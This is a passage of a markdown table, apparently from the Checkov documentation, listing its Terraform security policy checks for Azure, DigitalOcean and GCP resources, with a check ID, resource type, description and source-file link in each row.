[AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 1523 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | -| 1524 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1525 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1526 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1527 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | -| 1528 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically 
updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 1529 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 1530 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | -| 1531 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | -| 1532 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 1533 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 1534 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks 
are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 1535 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 1536 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | -| 1537 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 1538 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 1539 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 1540 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | 
[PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 1541 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | -| 1542 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1543 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1544 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1545 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1546 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for 
Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1547 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1548 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 1549 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 1550 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | -| 1551 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | -| 1552 | CKV2_AZURE_25 | resource | azurerm_mssql_database | 
Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | -| 1553 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | -| 1554 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | -| 1555 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | -| 1556 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | -| 1557 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | -| 1558 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is 
configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | -| 1559 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | -| 1560 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | -| 1561 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | -| 1562 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | -| 1563 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | -| 1564 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | 
[AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | 
-| 1565 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | 
-| 1566 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | 
-| 1567 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | 
-| 1568 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | 
-| 1569 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | 
-| 1570 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key 
authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | 
-| 1571 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | 
-| 1572 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | 
-| 1573 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | 
-| 1574 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | 
-| 1575 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | 
-| 1576 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | 
[AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | 
-| 1577 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | 
-| 1578 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | 
-| 1579 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | 
-| 1580 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | 
-| 1581 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | 
-| 1582 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | 
-| 1583 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is 
not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | 
-| 1584 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | 
-| 1585 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | 
-| 1586 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | 
-| 1587 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | 
-| 1588 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | 
-| 1589 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | 
[GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | 
-| 1590 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | 
-| 1591 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | 
-| 1592 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | 
-| 1593 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | 
-| 1594 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | 
-| 1595 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | 
-| 1596 | CKV_GCP_14 | resource | 
google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | 
-| 1597 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | 
-| 1598 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | 
-| 1599 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | 
-| 1600 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | 
-| 1601 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | 
-| 1602 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | 
[GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | 
-| 1603 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | 
-| 1604 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | 
-| 1605 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | 
-| 1606 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | 
-| 1607 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | 
-| 1608 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | 
-| 1609 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not 
anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | 
-| 1610 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | 
-| 1611 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | 
-| 1612 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | 
-| 1613 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | 
-| 1614 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | 
-| 1615 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | 
[GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | 
-| 1616 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | 
-| 1617 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | 
-| 1618 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | 
